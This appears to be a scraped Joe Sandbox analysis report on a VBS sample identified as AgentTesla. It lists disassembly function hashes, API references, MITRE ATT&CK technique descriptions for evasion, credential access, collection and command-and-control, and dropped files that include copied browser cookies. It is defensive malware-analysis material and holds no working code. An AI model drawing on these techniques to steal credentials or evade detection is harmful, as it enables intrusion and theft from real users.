Opcode Fuzzy Hash: 9b9df1d8582ee6816326df970c20574f5e0de92887cc09324f7e9449285b7d07
Instruction Fuzzy Hash: 0931D1B4D012499FDB20CFA9C584ACEFFF5BF48304F24856AE409AB351C7B59985CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1DAD5A21 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 1DAD5AED

Memory Dump Source

Source File: 0000001A.00000002.5753097145.000000001DAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1dad0000_CasPol.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 0a95b0f1f7094b60ca97eb6520cd4a52fde4ea06e67cdc7abf0d74428d72c9d4
Instruction ID: 944def38d8a659d49e0e8cadc84911f5b64bf1426344a97d52e58c8a3b31aa5c
Opcode Fuzzy Hash: 0a95b0f1f7094b60ca97eb6520cd4a52fde4ea06e67cdc7abf0d74428d72c9d4
Instruction Fuzzy Hash: 1E21CF798097558EDB40CFA4C1883EDBBF4FF4A314F24451AC58897291DB7AB514CB92

Uniqueness

Uniqueness Score: -1.00%

Function 20B00AFB Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 20B00B41

Memory Dump Source

Source File: 0000001A.00000002.5808148045.0000000020B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 20B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_20b00000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 800d6bc2431cdef56e023d4db38e607aa02ace6ab353bcbcc9dd3797d681d2fc
Instruction ID: a3aba97592a010b812c27ebecb1af95a65318554fc71d00b1cf83bc625354fe2
Opcode Fuzzy Hash: 800d6bc2431cdef56e023d4db38e607aa02ace6ab353bcbcc9dd3797d681d2fc
Instruction Fuzzy Hash: 0B112674910219DFCB28DFA4C49479DBBF2FF84345F208928E401A72A4DB36A986CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0135FA93 Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 0135FA9C

Memory Dump Source

Source File: 0000001A.00000002.5708057499.0000000001350000.00000040.00000400.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1350000_CasPol.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: a87d2c871e0737252c3b9dc933d2339b8dfc4365eec63e030366f266dc51f7f5
Instruction ID: f836900470a08ac8aca0d3089eaf43addc7d6f724d96a00ff851f405bb0d52bb
Opcode Fuzzy Hash: a87d2c871e0737252c3b9dc933d2339b8dfc4365eec63e030366f266dc51f7f5
Instruction Fuzzy Hash: 4BD0C974B4674BFAEF222A4858793D6239E6F12695E8E45054CC007041CB1A80CD8603

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PUMP mt310143121.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\RESA2B2.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fo0nlcmw.oxc.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mfxogem4.yt2.psm1

C:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP

C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.0.cs

C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline

C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.dll

C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.out

C:\Users\user\AppData\Roaming\5drowjrx.mtw\Chrome\Default\Cookies

C:\Users\user\AppData\Roaming\5drowjrx.mtw\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite

\Device\ConDrv

Static File Info

General

File Icon

Network Behavior

Windows Analysis Report
PUMP mt310143121.vbs

Function 0850DE20 Relevance: 1.6, APIs: 1, Instructions: 125
pipeCOMMON

Function 08631F50 Relevance: 2.6, Strings: 2, Instructions: 137
COMMON

Function 0850ADEA Relevance: 1.7, APIs: 1, Instructions: 211
COMMON

Function 0850DE14 Relevance: 1.6, APIs: 1, Instructions: 146
pipeCOMMON

Function 0895A8F8 Relevance: 1.6, Strings: 1, Instructions: 392
COMMON

Function 08505F28 Relevance: 1.6, APIs: 1, Instructions: 120
COMMON

Function 0850AD08 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Function 0850A2B8 Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Function 085059F4 Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Function 0895CBB5 Relevance: 1.6, Strings: 1, Instructions: 308
COMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre